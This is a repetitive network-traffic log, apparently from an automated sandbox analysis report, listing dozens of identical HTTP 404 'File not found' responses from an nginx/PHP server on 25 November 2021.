        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
